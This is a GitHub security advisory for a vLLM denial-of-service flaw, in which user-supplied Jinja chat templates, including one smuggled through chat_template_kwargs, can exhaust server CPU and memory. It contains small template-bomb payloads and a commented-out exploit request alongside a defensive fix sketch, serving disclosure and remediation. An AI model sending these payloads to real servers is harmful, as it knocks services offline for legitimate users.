GHSA-6FVQ-23CW-5628
Vulnerability from GitHub – Published: 2025-10-07 21:35 – Updated: 2025-10-07 21:35
Summary
A resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server due to the ability to specify Jinja templates via the chat_template and chat_template_kwargs parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources.
Details
When using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In Hugging Face transformers, this rendering is performed using a Jinja template. The OpenAI-Compatible Server launched by vllm serve exposes a chat_template parameter that lets users specify that template. In addition, the server accepts a chat_template_kwargs parameter to pass extra keyword arguments to the rendering function.
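For reference, this is how that rendering is normally invoked through transformers (a minimal benign sketch; the model name is a placeholder and the calls that would hit the network are left commented out):

# Benign chat-template rendering via Hugging Face transformers.
# "some-chat-model" is a placeholder, not a real checkpoint.
from transformers import AutoTokenizer

messages = [{"role": "user", "content": "Hello!"}]
# tokenizer = AutoTokenizer.from_pretrained("some-chat-model")
# prompt = tokenizer.apply_chat_template(
#     messages, tokenize=False, add_generation_prompt=True
# )  # renders the tokenizer's Jinja chat template into a prompt string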
Because Jinja templates support programming-language-like constructs (loops, nested iterations, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition.
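To see the scale involved (a hedged sketch using the jinja2 package directly, outside vLLM), a payload of a few dozen bytes can demand billions of loop iterations or a multi-gigabyte string:

# Illustration only: never render untrusted templates like these.
from jinja2 import Environment

cpu_bomb = (
    "{% for i in range(100000) %}"
    "{% for j in range(100000) %}x{% endfor %}"
    "{% endfor %}"
)  # ~10**10 inner iterations from a tiny payload
mem_bomb = "{{ 'x' * 10**9 }}"  # would build a ~1 GB string in memory

template = Environment().from_string(cpu_bomb)
# template.render()  # would pin a CPU core for a very long time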
Importantly, simply forbidding the chat_template parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for apply_hf_chat_template and then updates that dictionary with the user-supplied chat_template_kwargs via dict.update. Since dict.update can overwrite existing keys, an attacker can place a chat_template key inside chat_template_kwargs to replace the template that will be used by apply_hf_chat_template.
# vllm/entrypoints/openai/serving_engine.py#L794-L816
_chat_template_kwargs: dict[str, Any] = dict(
    chat_template=chat_template,
    add_generation_prompt=add_generation_prompt,
    continue_final_message=continue_final_message,
    tools=tool_dicts,
    documents=documents,
)
# User-supplied kwargs are merged last; dict.update lets them overwrite
# the server-controlled keys above, including chat_template.
_chat_template_kwargs.update(chat_template_kwargs or {})

request_prompt: Union[str, list[int]]
if isinstance(tokenizer, MistralTokenizer):
    ...
else:
    request_prompt = apply_hf_chat_template(
        tokenizer=tokenizer,
        conversation=conversation,
        model_config=model_config,
        **_chat_template_kwargs,
    )
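Concretely, a request along these lines would smuggle a template past a filter that only blocks the top-level chat_template field (a sketch: host and model name are placeholders, and the request is deliberately left commented out):

# Hypothetical exploit request against a vLLM OpenAI-compatible endpoint.
import requests

payload = {
    "model": "served-model",  # placeholder
    "messages": [{"role": "user", "content": "hi"}],
    "chat_template_kwargs": {
        # dict.update lets this key replace the server-side template
        "chat_template": "{% for i in range(10**8) %}x{% endfor %}",
    },
}
# requests.post("http://vllm-host:8000/v1/chat/completions", json=payload)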
Impact
If an OpenAI-Compatible Server exposes endpoints that accept chat_template or chat_template_kwargs from untrusted clients, an attacker can submit a malicious Jinja template (directly or by overriding chat_template inside chat_template_kwargs) that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial-of-service that renders the server unresponsive to legitimate requests.
Fixes
- https://github.com/vllm-project/vllm/pull/25794
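The linked PR contains the upstream fix. As an illustration only (not the actual patch), one server-side guard is to reject user-supplied keys that would shadow server-controlled arguments before the merge; the key names below follow the excerpt above, while the helper itself is hypothetical:

# Sketch of a defensive merge; function name and structure are hypothetical.
from typing import Any, Optional

RESERVED_KEYS = {"chat_template", "add_generation_prompt",
                 "continue_final_message", "tools", "documents"}

def safe_merge(base: dict[str, Any],
               user_kwargs: Optional[dict[str, Any]]) -> dict[str, Any]:
    user_kwargs = user_kwargs or {}
    clash = RESERVED_KEYS & user_kwargs.keys()
    if clash:
        raise ValueError(f"disallowed chat_template_kwargs keys: {sorted(clash)}")
    merged = dict(base)
    merged.update(user_kwargs)  # safe: reserved keys already rejected
    return merged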
{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "vllm"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.5.1"
            },
            {
              "fixed": "0.11.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-61620"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20",
      "CWE-400",
      "CWE-770"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-10-07T21:35:22Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nA resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server due to the ability to specify Jinja templates via the `chat_template` and `chat_template_kwargs` parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources.\n\n### Details\n\nWhen using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In `hf/transformer`, this rendering is performed using a Jinja template. The OpenAI-Compatible Server launched by vllm serve exposes a `chat_template` parameter that lets users specify that template. In addition, the server accepts a `chat_template_kwargs` parameter to pass extra keyword arguments to the rendering function.\n\nBecause Jinja templates support programming-language-like constructs (loops, nested iterations, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition.\n\nImportantly, simply forbidding the `chat_template` parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for `apply_hf_chat_template` and then updates that dictionary with the user-supplied `chat_template_kwargs` via `dict.update`. Since `dict.update` can overwrite existing keys, an attacker can place a `chat_template` key inside `chat_template_kwargs` to replace the template that will be used by `apply_hf_chat_template`.\n\n\n```python\n# vllm/entrypoints/openai/serving_engine.py#L794-L816\n_chat_template_kwargs: dict[str, Any] = dict(\n    chat_template=chat_template,\n    add_generation_prompt=add_generation_prompt,\n    continue_final_message=continue_final_message,\n    tools=tool_dicts,\n    documents=documents,\n)\n_chat_template_kwargs.update(chat_template_kwargs or {})\n\nrequest_prompt: Union[str, list[int]]\nif isinstance(tokenizer, MistralTokenizer):\n    ...\nelse:\n    request_prompt = apply_hf_chat_template(\n        tokenizer=tokenizer,\n        conversation=conversation,\n        model_config=model_config,\n        **_chat_template_kwargs,\n    )\n```\n\n### Impact\n\nIf an OpenAI-Compatible Server exposes endpoints that accept `chat_template` or `chat_template_kwargs` from untrusted clients, an attacker can submit a malicious Jinja template (directly or by overriding `chat_template` inside `chat_template_kwargs`) that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial-of-service that renders the server unresponsive to legitimate requests.\n\n### Fixes\n\n* https://github.com/vllm-project/vllm/pull/25794",
  "id": "GHSA-6fvq-23cw-5628",
  "modified": "2025-10-07T21:35:23Z",
  "published": "2025-10-07T21:35:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-6fvq-23cw-5628"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/pull/25794"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vllm-project/vllm/commit/7977e5027c2250a4abc1f474c5619c40b4e5682f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vllm-project/vllm"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "vLLM: Resource-Exhaustion (DoS) through Malicious Jinja Template in OpenAI-Compatible Server"
}